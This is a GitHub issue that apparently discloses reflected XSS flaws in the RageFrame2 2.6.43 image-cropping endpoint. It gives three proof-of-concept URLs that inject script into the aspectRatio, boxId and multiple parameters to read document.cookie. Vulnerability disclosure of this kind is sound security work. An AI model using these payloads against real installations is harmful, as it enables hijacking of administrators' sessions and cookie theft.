Skip to content

RageFrame2 2.6.43 has several reflective XSS vulnerabilities #114

Open
@Hebing123

Description

@Hebing123

Summary

RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link containing malicious code.

Details

In the image cropping function of RageFrame2 2.6.43, aspectRatio, boxId and multiple variables are not filtered, resulting in multiple reflective XSS vulnerabilities.

POC

aspectRatio XSS payload

http://your-ip/backend/cropper/crop?aspectRatio=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&boxId=1&multiple=0
image

boxId XSS payload

http://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&multiple=0
image

multiple XSS payload

http://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=1&multiple=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions